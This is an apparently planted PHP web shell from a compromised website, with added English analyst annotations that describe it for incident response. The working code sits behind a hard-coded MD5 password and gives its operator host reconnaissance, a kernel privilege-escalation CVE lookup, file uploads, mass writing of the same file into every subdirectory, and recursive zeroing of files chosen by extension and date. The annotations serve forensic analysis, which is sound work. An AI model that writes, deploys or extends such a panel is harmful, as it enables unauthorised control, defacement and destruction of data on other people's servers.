/home/fresvfqn/24hourwaterdamagerestorationlongisland.com/bajk/tesy.php
<?php
// NOTE(review): Analyst annotation. This script puts a single-password gate in
// front of a host-information display, a kernel-version lookup, a file upload
// form and bulk create/scan/truncate operations on whatever directory the
// operator names. That combination looks like a web shell / mass file-tampering
// panel rather than a site feature -- treat the file as an intrusion artifact
// and confirm against the site's deployment history before relying on that reading.
// The PHP session carries the login flag ('logged_in') that the gate below checks.
session_start();
// Every PHP notice, warning and error is reported and rendered into the HTTP
// response, so server paths can appear in the page output.
error_reporting(E_ALL);
ini_set('display_errors', 1);
// ===== LOGIN CONFIGURATION =====
// Hard-coded, unsalted MD5 digest that the posted password is compared against.
// The trailing comment is the author's own statement of the plaintext; it has
// not been verified here. The digest literal is a stable string taken from this
// sample and can serve as a search term when sweeping other web roots for copies.
$stored_hash = "da86a3a1b1f29bceeda7b0f68ba90b5d"; // md5("Hadii")
// ===== LOGOUT =====
// Any request carrying a 'logout' query parameter (its value is not inspected)
// destroys the session and redirects back to this script, then stops.
if (isset($_GET['logout'])) {
session_destroy();
header("Location: " . $_SERVER['PHP_SELF']);
exit;
}
// ===== LOGIN CHECK =====
// Gate for everything that follows: unless the session already holds
// logged_in === true, only the login form is served. The body of this `if`
// continues past the closing PHP tag into the login form markup.
// NOTE(review): there is no username, and this block shows no attempt counter,
// delay or logging of failures; the session ID is not regenerated on success.
// For log review: a correct password is a POST to this script answered with a
// redirect to the same path (PHP's default for a Location header), while a wrong
// one falls through to the form page -- confirm against the web server logs.
if (!isset($_SESSION['logged_in']) || $_SESSION['logged_in'] !== true) {
$error = '';
// Only a POST that carries the hidden 'login' field is treated as a login attempt.
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['login'])) {
$password = $_POST['password'] ?? '';
// Strict string comparison of the MD5 hex digest with the hard-coded value;
// hash_equals() is not used, so the comparison is not constant-time.
if (md5($password) === $stored_hash) {
$_SESSION['logged_in'] = true;
// Redirect after the POST so the panel itself is loaded with a fresh GET.
header("Location: " . $_SERVER['PHP_SELF']);
exit;
} else {
// Fixed error text ("Wrong password!") shown in the form below.
$error = "Password salah!";
}
}
?>
<!DOCTYPE html>
<html>
<head>
<title>Login</title>
<style>
* {
margin: 0;
padding: 0;
box-sizing: border-box;
font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
}
body {
font-family: Arial;
background: linear-gradient(135deg, #1a2a6c, #b21f1f, #fdbb2d);
text-align:center;
padding-top:100px;
min-height: 100vh;
display: flex;
align-items: center;
justify-content: center;
}
.login-container {
background: rgba(255, 255, 255, 0.95);
padding: 40px;
border-radius: 15px;
box-shadow: 0 15px 30px rgba(0,0,0,0.3);
width: 100%;
max-width: 400px;
}
h2 {
color: #1a2a6c;
margin-bottom: 30px;
font-size: 1.8rem;
}
input[type=password] {
padding: 15px;
width: 100%;
border: 2px solid #e0e0e0;
border-radius: 8px;
font-size: 1rem;
margin-bottom: 20px;
transition: border-color 0.3s;
}
input[type=password]:focus {
border-color: #1a2a6c;
outline: none;
}
input[type=submit] {
padding: 15px 30px;
background: linear-gradient(to right, #1a2a6c, #b21f1f);
color: white;
border: none;
border-radius: 8px;
font-size: 1rem;
font-weight: bold;
cursor: pointer;
transition: all 0.3s;
width: 100%;
}
input[type=submit]:hover {
background: linear-gradient(to right, #b21f1f, #fdbb2d);
transform: translateY(-2px);
}
.error {
color: #b21f1f;
background: #f8d7da;
padding: 10px;
border-radius: 5px;
margin-top: 15px;
border: 1px solid #f5c6cb;
}
</style>
</head>
<body>
<div class="login-container">
<h2>Masukkan Password</h2>
<form method="post">
<input type="hidden" name="login" value="1">
<input type="password" name="password" placeholder="Password" required>
<input type="submit" value="Login">
<?php if (!empty($error)) echo "<div class='error'>$error</div>"; ?>
</form>
</div>
</body>
</html>
<?php
exit;
}
// ===== FUNGSI SISTEM INFORMASI =====
function getSystemInfo() {
    // Builds the associative array of host and request details that the
    // "System Info" tab prints: OS name/release/version from php_uname(),
    // server and client addresses from $_SERVER, this script's path, the
    // current working directory, the PHP version and the server software banner.
    // Missing $_SERVER entries are replaced by a fixed placeholder string.
    // NOTE(review): in a panel like this one the values serve as host
    // reconnaissance for the operator; nothing here modifies the system.
    $placeholder = 'Tidak tersedia';
    $unameParts = [php_uname('s'), php_uname('r'), php_uname('v')];

    return [
        'kernel' => implode(' ', $unameParts),
        'server_ip' => $_SERVER['SERVER_ADDR'] ?? $placeholder,
        'client_ip' => $_SERVER['REMOTE_ADDR'] ?? $placeholder,
        'script_path' => __FILE__,
        'working_dir' => getcwd(),
        'php_version' => phpversion(),
        'server_software' => $_SERVER['SERVER_SOFTWARE'] ?? $placeholder,
    ];
}
// ===== FUNGSI VULNERABILITY SCANNER =====
function checkKernelVulnerabilities($kernel) {
    // Looks the given kernel string up in a small hard-coded table and returns
    // a list of ['kernel', 'description', 'severity'] rows: one "Tinggi" (high)
    // row per table key found as a substring of $kernel, or a single "Rendah"
    // (low) row echoing $kernel when nothing matches.
    // NOTE(review): the CVE labels are reproduced from the sample as written
    // and are not verified here. A substring match on the uname string says
    // nothing about patch level (distributions backport fixes without changing
    // the base version), and the fallback row only means "not in this
    // five-entry table" -- neither result is evidence about the host's exposure.
    $knownEntries = [
        'Linux 3.10.0' => 'CVE-2016-5195 (Dirty COW) - Privilege escalation',
        'Linux 4.4.0' => 'CVE-2017-16995 - Privilege escalation',
        'Linux 4.10.0' => 'CVE-2017-1000112 - Memory corruption',
        'Linux 4.14.0' => 'CVE-2018-5333 - Remote code execution',
        'Linux 5.0.0' => 'CVE-2019-8912 - Information disclosure',
    ];

    $matches = [];
    foreach ($knownEntries as $needle => $label) {
        if (strpos($kernel, $needle) === false) {
            continue;
        }
        $matches[] = [
            'kernel' => $needle,
            'description' => $label,
            'severity' => 'Tinggi',
        ];
    }

    if (!empty($matches)) {
        return $matches;
    }

    // No table key occurred in the string: report the input itself as "low".
    return [
        [
            'kernel' => $kernel,
            'description' => 'Tidak ditemukan kerentanan yang diketahui dalam database kami',
            'severity' => 'Rendah',
        ],
    ];
}
// ===== FUNGSI UPLOAD FILE =====
// Handles a POSTed 'uploaded_file' field and stores it under 'uploads/'.
// Returns an array: ['success' => message, 'file_path' => path] when the file
// was stored, ['error' => message] when it was rejected or could not be moved,
// and an empty array when the request is not a POST with that field.
// NOTE(review): for incident response, 'uploads/' is a relative path, so the
// directory is created under the process working directory; its contents are
// worth collecting alongside this script.
function handleFileUpload() {
$uploadResult = [];
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_FILES['uploaded_file'])) {
$uploadDir = 'uploads/';
// Create the uploads directory if it does not exist yet.
// The mkdir() result is not checked, and this runs before any validation,
// so a rejected upload still creates the directory.
if (!is_dir($uploadDir)) {
mkdir($uploadDir, 0755, true);
}
// The stored name is the client-supplied name with directory components stripped.
$fileName = basename($_FILES['uploaded_file']['name']);
$filePath = $uploadDir . $fileName;
$fileType = strtolower(pathinfo($filePath, PATHINFO_EXTENSION));
// File validation (example: only allow image and txt files).
// Only the extension of the name is compared with the list; the file content
// is not inspected, and $_FILES['uploaded_file']['error'] is never consulted.
$allowedTypes = ['jpg', 'jpeg', 'png', 'gif', 'txt', 'pdf'];
if (in_array($fileType, $allowedTypes)) {
if ($_FILES['uploaded_file']['size'] < 5000000) { // 5 MB maximum
// move_uploaded_file() overwrites an existing file of the same name.
if (move_uploaded_file($_FILES['uploaded_file']['tmp_name'], $filePath)) {
// The file name is HTML-escaped here because the page echoes this message as-is.
$uploadResult['success'] = "File " . htmlspecialchars($fileName) . " berhasil diupload.";
$uploadResult['file_path'] = $filePath;
} else {
$uploadResult['error'] = "Terjadi kesalahan saat mengupload file.";
}
} else {
$uploadResult['error'] = "File terlalu besar. Maksimal 5MB.";
}
} else {
$uploadResult['error'] = "Hanya file JPG, JPEG, PNG, GIF, TXT, dan PDF yang diizinkan.";
}
}
return $uploadResult;
}
// ===== PROCESS FILE UPLOAD =====
// Runs on every authenticated request; the result is an empty array unless the
// request is a POST that carries an 'uploaded_file' field.
$uploadResult = handleFileUpload();
// ===== MASS UPLOADER FEATURE =====
// Dispatches the three bulk actions posted from the "Mass Operations" tab:
//   create - write the same folder and/or file into every immediate subdirectory of base_path
//   scan   - list files under base_path by extension and minimum modification date
//   blank  - truncate the files selected by the last scan's criteria to zero bytes
// $results collects HTML fragments that the page later echoes one by one.
// NOTE(review): several fragments interpolate $basePath, $newFolder, $ext and
// $dateIn without htmlspecialchars(), while others escape their paths.
// NOTE(review): for incident response the traces to look for are (a) identical
// file names/contents replicated across sibling directories, (b) '.bak' and
// '.<unix time>.bak' files, which are the displaced originals and can be used
// for recovery, and (c) zero-length files whose extension matches a scan.
$results = [];
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['action'])) {
$action = $_POST['action'];
// base_path is taken from the request as given; only trailing slashes are
// removed and the only check is that it is an existing directory.
$basePath = rtrim($_POST['base_path'] ?? '', '/');
if (!is_dir($basePath)) {
$results[] = "<div class='error'>Base path tidak ditemukan: $basePath</div>";
} else {
if ($action === 'create') {
$folderName = trim($_POST['folder_name'] ?? '');
$fileName = trim($_POST['file_name'] ?? '');
$fileContent = $_POST['file_content'] ?? '';
// Immediate subdirectories only (one level below base_path).
// glob() can return false on error; that case is not handled here.
$subfolders = glob($basePath . '/*', GLOB_ONLYDIR);
foreach ($subfolders as $sub) {
$targetFolder = $sub;
if ($folderName) {
// folder_name is concatenated as posted; no basename() or other filtering.
$newFolder = $sub . '/' . $folderName;
if (!is_dir($newFolder)) {
if (mkdir($newFolder, 0755)) {
$results[] = "<div class='success'>Folder dibuat: $newFolder</div>";
} else {
$results[] = "<div class='error'>Gagal membuat folder: $newFolder</div>";
}
}
// The file below is written into the new folder even if mkdir() failed.
$targetFolder = $newFolder;
}
if ($fileName) {
// file_name is likewise concatenated as posted.
$filePath = $targetFolder . '/' . $fileName;
// Back up the file if it already exists: the original is renamed to
// '<name>.bak', or to '<name>.<unix time>.bak' when a .bak is already present.
if (file_exists($filePath)) {
$backupPath = $filePath . '.bak';
if (file_exists($backupPath)) {
$backupPath = $filePath . '.' . time() . '.bak';
}
if (rename($filePath, $backupPath)) {
$results[] = "<div class='success'>File lama dipindahkan ke: " . htmlspecialchars($backupPath) . "</div>";
} else {
$results[] = "<div class='error'>Gagal membuat backup: " . htmlspecialchars($filePath) . "</div>";
}
}
// Create the new file. This runs even when the rename above failed, in which
// case the existing file is overwritten without a backup.
if (file_put_contents($filePath, $fileContent) !== false) {
$results[] = "<div class='success'>File dibuat: " . htmlspecialchars($filePath) . "</div>";
} else {
$results[] = "<div class='error'>Gagal membuat file: " . htmlspecialchars($filePath) . "</div>";
}
}
}
if (empty($subfolders)) {
$results[] = "<div class='error'>Tidak ada subfolder di $basePath</div>";
}
} elseif ($action === 'scan') {
$ext = trim($_POST['file_ext'] ?? '');
$dateIn = trim($_POST['date_from'] ?? '');
if (!$ext || !$dateIn) {
$results[] = "<div class='error'>Ekstensi dan tanggal wajib diisi!</div>";
} else {
// Midnight of the posted date; strtotime() returns false for an unparsable
// date and that value is used in the comparison below without a check.
$timestamp = strtotime($dateIn . " 00:00:00");
$foundFiles = [];
// Full recursive walk of base_path, skipping '.' and '..'.
$iterator = new RecursiveIteratorIterator(
new RecursiveDirectoryIterator($basePath, RecursiveDirectoryIterator::SKIP_DOTS),
RecursiveIteratorIterator::SELF_FIRST
);
foreach ($iterator as $file) {
// Case-insensitive extension match, then modification time on or after the cutoff.
if ($file->isFile() && strtolower(pathinfo($file, PATHINFO_EXTENSION)) === strtolower($ext)) {
if ($file->getMTime() >= $timestamp) {
$foundFiles[] = $file->getPathname();
}
}
}
if ($foundFiles) {
$results[] = "<div class='success'>Ditemukan " . count($foundFiles) . " file:</div><ul>";
foreach ($foundFiles as $f) {
$results[] = "<li>" . htmlspecialchars($f) . "</li>";
}
$results[] = "</ul>";
// The criteria (not the file list) are kept in the session for the 'blank' action.
$_SESSION['scan_base'] = $basePath;
$_SESSION['scan_ext'] = $ext;
$_SESSION['scan_date'] = $dateIn;
} else {
$results[] = "<div class='error'>Tidak ada file .$ext setelah tanggal $dateIn</div>";
}
}
} elseif ($action === 'blank') {
// Destructive step: re-reads the criteria saved by the last successful scan
// and walks the tree again, so the set of files is recomputed at this moment
// rather than taken from the list that was displayed. No backup is made.
$basePath = $_SESSION['scan_base'] ?? $basePath;
$ext = $_SESSION['scan_ext'] ?? '';
$dateIn = $_SESSION['scan_date'] ?? '';
$timestamp = strtotime($dateIn . " 00:00:00");
$count = 0;
$iterator = new RecursiveIteratorIterator(
new RecursiveDirectoryIterator($basePath, RecursiveDirectoryIterator::SKIP_DOTS),
RecursiveIteratorIterator::SELF_FIRST
);
foreach ($iterator as $file) {
if ($file->isFile() && strtolower(pathinfo($file, PATHINFO_EXTENSION)) === strtolower($ext)) {
if ($file->getMTime() >= $timestamp) {
// Writing an empty string leaves the file in place with zero length.
if (file_put_contents($file->getPathname(), "") !== false) {
$results[] = "<div class='success'>Dikosongkan: ".htmlspecialchars($file->getPathname())."</div>";
$count++;
} else {
$results[] = "<div class='error'>Gagal kosongkan: ".htmlspecialchars($file->getPathname())."</div>";
}
}
}
}
if ($count === 0) {
$results[] = "<div class='error'>Tidak ada file .$ext yang bisa dikosongkan</div>";
}
}
}
}
// ===== GET SYSTEM INFORMATION =====
// Collected on every authenticated page load and rendered by the markup that
// follows; the kernel string from php_uname() is what the lookup table is matched against.
$systemInfo = getSystemInfo();
$vulnerabilities = checkKernelVulnerabilities($systemInfo['kernel']);
?>
<!DOCTYPE html>
<html lang="id">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>System Manager - Complete Toolkit</title>
<style>
* {
margin: 0;
padding: 0;
box-sizing: border-box;
font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
}
body {
background: linear-gradient(135deg, #1a2a6c, #b21f1f, #fdbb2d);
color: #333;
min-height: 100vh;
padding: 20px;
}
.container {
max-width: 1400px;
margin: 0 auto;
}
header {
text-align: center;
margin-bottom: 30px;
color: white;
text-shadow: 0 2px 4px rgba(0,0,0,0.3);
position: relative;
}
h1 {
font-size: 2.5rem;
margin-bottom: 10px;
}
.subtitle {
font-size: 1.2rem;
opacity: 0.9;
}
.logout {
position: absolute;
top: 0;
right: 0;
}
.logout a {
padding: 10px 20px;
background: #f44336;
color: white;
text-decoration: none;
border-radius: 5px;
transition: all 0.3s;
}
.logout a:hover {
background: #d32f2f;
transform: translateY(-2px);
}
.card {
background: rgba(255, 255, 255, 0.95);
border-radius: 15px;
padding: 25px;
margin-bottom: 25px;
box-shadow: 0 10px 20px rgba(0,0,0,0.2);
transition: transform 0.3s ease;
}
.card:hover {
transform: translateY(-5px);
}
.card h2 {
color: #1a2a6c;
margin-bottom: 15px;
padding-bottom: 10px;
border-bottom: 2px solid #fdbb2d;
}
.info-grid {
display: grid;
grid-template-columns: repeat(auto-fill, minmax(300px, 1fr));
gap: 15px;
}
.info-item {
background: white;
padding: 15px;
border-radius: 10px;
box-shadow: 0 4px 6px rgba(0,0,0,0.1);
}
.info-label {
font-weight: bold;
color: #1a2a6c;
}
.vulnerability-item {
background: white;
padding: 15px;
border-radius: 10px;
margin-bottom: 10px;
border-left: 5px solid #b21f1f;
}
.severity-high {
border-left-color: #b21f1f;
}
.severity-low {
border-left-color: #28a745;
}
fieldset {
border: 2px solid #1a2a6c;
border-radius: 10px;
padding: 20px;
margin-bottom: 20px;
background: white;
}
legend {
font-weight: bold;
color: #1a2a6c;
padding: 0 10px;
font-size: 1.2rem;
}
input, textarea, select {
width: 100%;
padding: 12px;
margin: 8px 0;
border: 2px solid #e0e0e0;
border-radius: 8px;
font-size: 1rem;
transition: border-color 0.3s;
}
input:focus, textarea:focus, select:focus {
border-color: #1a2a6c;
outline: none;
}
button, .btn {
background: linear-gradient(to right, #1a2a6c, #b21f1f);
color: white;
border: none;
padding: 12px 25px;
border-radius: 8px;
cursor: pointer;
font-size: 1rem;
font-weight: bold;
transition: all 0.3s ease;
text-decoration: none;
display: inline-block;
margin: 5px;
}
button:hover, .btn:hover {
background: linear-gradient(to right, #b21f1f, #fdbb2d);
transform: translateY(-2px);
box-shadow: 0 5px 15px rgba(0,0,0,0.2);
}
.alert {
padding: 15px;
border-radius: 5px;
margin-bottom: 15px;
}
.alert-success {
background-color: #d4edda;
color: #155724;
border: 1px solid #c3e6cb;
}
.alert-error {
background-color: #f8d7da;
color: #721c24;
border: 1px solid #f5c6cb;
}
.success {
color: #28a745;
background: #d4edda;
padding: 10px;
border-radius: 5px;
margin: 5px 0;
border: 1px solid #c3e6cb;
}
.error {
color: #dc3545;
background: #f8d7da;
padding: 10px;
border-radius: 5px;
margin: 5px 0;
border: 1px solid #f5c6cb;
}
.tab-container {
display: flex;
margin-bottom: 20px;
background: white;
border-radius: 10px;
overflow: hidden;
box-shadow: 0 4px 6px rgba(0,0,0,0.1);
}
.tab {
padding: 15px 25px;
background: #f8f9fa;
border: none;
cursor: pointer;
flex: 1;
text-align: center;
font-weight: bold;
transition: all 0.3s;
}
.tab.active {
background: #1a2a6c;
color: white;
}
.tab-content {
display: none;
}
.tab-content.active {
display: block;
}
footer {
text-align: center;
margin-top: 30px;
color: white;
opacity: 0.8;
}
@media (max-width: 768px) {
.info-grid {
grid-template-columns: 1fr;
}
h1 {
font-size: 2rem;
}
.tab-container {
flex-direction: column;
}
}
</style>
</head>
<body>
<div class="container">
<header>
<div class="logout">
<a href="?logout=1">Logout</a>
</div>
<h1>System Manager - Complete Toolkit</h1>
<p class="subtitle">Informasi Sistem, Security Scanner, File Management & Mass Operations</p>
</header>
<!-- Tab Navigation -->
<div class="tab-container">
<button class="tab active" onclick="switchTab('system')">System Info</button>
<button class="tab" onclick="switchTab('security')">Security Scanner</button>
<button class="tab" onclick="switchTab('upload')">File Upload</button>
<button class="tab" onclick="switchTab('mass')">Mass Operations</button>
</div>
<!-- System Info Tab -->
<div id="system" class="tab-content active">
<div class="card">
<h2>Informasi Sistem</h2>
<div class="info-grid">
<div class="info-item">
<div class="info-label">Kernel</div>
<div><?php echo htmlspecialchars($systemInfo['kernel']); ?></div>
</div>
<div class="info-item">
<div class="info-label">IP Server</div>
<div><?php echo htmlspecialchars($systemInfo['server_ip']); ?></div>
</div>
<div class="info-item">
<div class="info-label">IP Client</div>
<div><?php echo htmlspecialchars($systemInfo['client_ip']); ?></div>
</div>
<div class="info-item">
<div class="info-label">Path Script</div>
<div><?php echo htmlspecialchars($systemInfo['script_path']); ?></div>
</div>
<div class="info-item">
<div class="info-label">Working Directory</div>
<div><?php echo htmlspecialchars($systemInfo['working_dir']); ?></div>
</div>
<div class="info-item">
<div class="info-label">Versi PHP</div>
<div><?php echo htmlspecialchars($systemInfo['php_version']); ?></div>
</div>
<div class="info-item">
<div class="info-label">Server Software</div>
<div><?php echo htmlspecialchars($systemInfo['server_software']); ?></div>
</div>
</div>
</div>
</div>
<!-- Security Scanner Tab -->
<div id="security" class="tab-content">
<div class="card">
<h2>Kernel Vulnerability Scanner</h2>
<?php foreach ($vulnerabilities as $vuln): ?>
<div class="vulnerability-item severity-<?php echo strtolower(explode(' ', $vuln['severity'])[0]); ?>">
<div class="info-label">Kernel: <?php echo htmlspecialchars($vuln['kernel']); ?></div>
<div><strong>Deskripsi:</strong> <?php echo htmlspecialchars($vuln['description']); ?></div>
<div><strong>Tingkat Keparahan:</strong> <?php echo htmlspecialchars($vuln['severity']); ?></div>
</div>
<?php endforeach; ?>
<p style="margin-top: 15px; font-style: italic;">
Catatan: Scanner ini hanya untuk tujuan edukasi dan menggunakan database terbatas.
Untuk analisis keamanan yang komprehensif, gunakan alat profesional seperti Nessus, OpenVAS, atau Nikto.
</p>
</div>
</div>
<!-- File Upload Tab -->
<div id="upload" class="tab-content">
<div class="card">
<h2>Upload File</h2>
<?php if (isset($uploadResult['success'])): ?>
<div class="alert alert-success">
<?php echo $uploadResult['success']; ?>
<?php if (isset($uploadResult['file_path'])): ?>
<br>File disimpan di: <?php echo htmlspecialchars($uploadResult['file_path']); ?>
<?php endif; ?>
</div>
<?php elseif (isset($uploadResult['error'])): ?>
<div class="alert alert-error">
<?php echo $uploadResult['error']; ?>
</div>
<?php endif; ?>
<form class="upload-form" action="" method="post" enctype="multipart/form-data">
<div class="form-group">
<label for="uploaded_file">Pilih file untuk diupload (maks. 5MB):</label>
<input type="file" name="uploaded_file" id="uploaded_file" required>
</div>
<button type="submit">Upload File</button>
</form>
<div style="margin-top: 15px;">
<p><strong>File yang diizinkan:</strong> JPG, JPEG, PNG, GIF, TXT, PDF</p>
</div>
</div>
</div>
<!-- Mass Operations Tab -->
<div id="mass" class="tab-content">
<div class="card">
<h2>Mass File Operations</h2>
<fieldset>
<legend><b>Buat Folder & File Baru</b></legend>
<form method="POST">
<input type="hidden" name="action" value="create">
<label>Base Path (contoh: /home/user1)</label>
<input type="text" name="base_path" required value="<?php echo htmlspecialchars($systemInfo['working_dir']); ?>">
<label>Nama Folder Baru (opsional)</label>
<input type="text" name="folder_name">
<label>Nama File (opsional)</label>
<input type="text" name="file_name">
<label>Isi File</label>
<textarea name="file_content" rows="6"></textarea>
<button type="submit">Jalankan</button>
</form>
</fieldset>
<fieldset>
<legend><b>Scan File</b></legend>
<form method="POST">
<input type="hidden" name="action" value="scan">
<label>Base Path (contoh: /home/user1)</label>
<input type="text" name="base_path" required value="<?php echo htmlspecialchars($systemInfo['working_dir']); ?>">
<label>Ekstensi File (contoh: php, html, txt)</label>
<input type="text" name="file_ext" required>
<label>Scan mulai tanggal (format: yyyy-mm-dd)</label>
<input type="date" name="date_from" required>
<button type="submit">Scan File</button>
</form>
</fieldset>
<?php if(isset($_SESSION['scan_base'])): ?>
<fieldset>
<legend><b>Mass Blank File</b></legend>
<form method="POST" id="blankForm">
<input type="hidden" name="action" value="blank">
<button type="submit">Kosongkan Semua File Ini</button>
</form>
<script>
document.getElementById('blankForm').onsubmit = function() {
return confirm("Apakah Anda yakin ingin mengosongkan file ini?\nTindakan ini tidak bisa di-undo.");
};
</script>
</fieldset>
<?php endif; ?>
<!-- Results Display -->
<?php if (!empty($results)): ?>
<fieldset>
<legend><b>Hasil Operasi</b></legend>
<div>
<?php foreach ($results as $r) { echo $r . "<br>"; } ?>
</div>
</fieldset>
<?php endif; ?>
</div>
</div>
<footer>
<p>System Manager - Complete Toolkit © <?php echo date('Y'); ?></p>
</footer>
</div>
<script>
function switchTab(tabName) {
    // Deactivate every content panel, then every tab button.
    for (const panel of document.querySelectorAll('.tab-content')) {
        panel.classList.remove('active');
    }
    for (const button of document.querySelectorAll('.tab')) {
        button.classList.remove('active');
    }

    // Activate the panel whose id equals tabName.
    const selectedPanel = document.getElementById(tabName);
    selectedPanel.classList.add('active');

    // Mark the clicked button as active. `event` is not a parameter: this relies
    // on the implicit global event object available while the inline onclick
    // handler is running.
    const clickedButton = event.currentTarget;
    clickedButton.classList.add('active');
}
</script>
</body>
</html>